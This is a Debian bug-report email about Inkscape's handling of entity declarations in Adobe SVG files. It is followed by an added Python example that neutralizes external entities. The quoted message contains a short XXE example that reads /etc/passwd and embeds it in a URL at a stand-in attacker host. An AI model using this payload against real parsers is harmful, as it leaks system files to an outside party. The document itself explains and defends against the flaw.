
Bug#721384: Update from an Inkscape'er



<!ENTITY ns_svg "http://www.w3.org/2000/svg"> can cause security
concerns, the example given to me from my friend:

/
| You can replace that with <!ENTITY yoursecrets SYSTEM "/etc/passwd"> and
| add in <!ENTITY web_var "http://myevilwebsite.com?&yoursecrets;">
| 
| We backported the security fix quite far. But it affects libxml2 before
| a certain version, it's just that Adobe files /require/ the security hole.
| 
| So we have to open the file, detect an Adobe file with a parsing error,
| reopen the file and search and replace dangerous text (that might break
| the file) and reparse with the security switched off in libxml2.
\


Cheers,
   T

-- 
 .''`.  Paul Tagliamonte <paultag@debian.org>
: :'  : Proud Debian Developer
`. `'`  4096R / 8F04 9AD8 2C92 066C 7352  D28A 7B58 5B30 807C 2A87
 `-     http://people.debian.org/~paultag
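
The "search and replace dangerous text" step from the quoted message, sketched as an added Python example; it is not Inkscape's code and not part of the original mail. The names `classify`, `neutralize` and `SAMPLE`, and the choice to stub an external entity with an empty value so that references to it still resolve, are assumptions made for illustration.

```python
import re

# One <!ENTITY ...> declaration; quoted literals may legally contain '>'.
DECL_RE = re.compile(r'<!ENTITY((?:"[^"]*"|\'[^\']*\'|[^>"\'])*)>')
# Plain internal general entity: a name followed by one quoted literal.
INTERNAL_RE = re.compile(r'\s+([^\s%"\']+)\s+("[^"]*"|\'[^\']*\')\s*$')
# Name of a general (non-parameter) entity, used when stubbing it out.
NAME_RE = re.compile(r'\s+([^\s%"\']+)\s')

# Constructed sample: an Adobe-style internal entity plus the two
# declarations quoted in the mail above.
SAMPLE = '''<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY ns_svg "http://www.w3.org/2000/svg">
  <!ENTITY yoursecrets SYSTEM "/etc/passwd">
  <!ENTITY web_var "http://myevilwebsite.com?&yoursecrets;">
]>
<svg xmlns="&ns_svg;"><desc>&web_var;</desc></svg>
'''


def classify(svg_text):
    """Return (kept, flagged) entity names declared in svg_text."""
    kept, flagged = [], []
    for m in DECL_RE.finditer(svg_text):
        internal = INTERNAL_RE.match(m.group(1))
        if internal:
            kept.append(internal.group(1))
        else:
            name = NAME_RE.match(m.group(1))
            flagged.append(name.group(1) if name else m.group(1).strip())
    return kept, flagged


def neutralize(svg_text):
    """Rewrite every declaration that is not a plain internal entity."""
    def repl(m):
        body = m.group(1)
        if INTERNAL_RE.match(body):
            return m.group(0)                 # e.g. ns_svg: keep untouched
        name = NAME_RE.match(body)
        if name:                              # SYSTEM/PUBLIC general entity
            return '<!ENTITY %s "">' % name.group(1)  # references still resolve
        return ''                             # parameter entity: drop it
    out = DECL_RE.sub(repl, svg_text)
    # Fail closed: an unterminated declaration never matches DECL_RE.
    if out.count('<!ENTITY') != len(DECL_RE.findall(out)):
        raise ValueError('unparseable <!ENTITY declaration')
    return out
```

After `neutralize(SAMPLE)`, `ns_svg` and `web_var` are unchanged while `yoursecrets` is an empty internal entity, so expanding `&web_var;` yields only the literal URL text.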
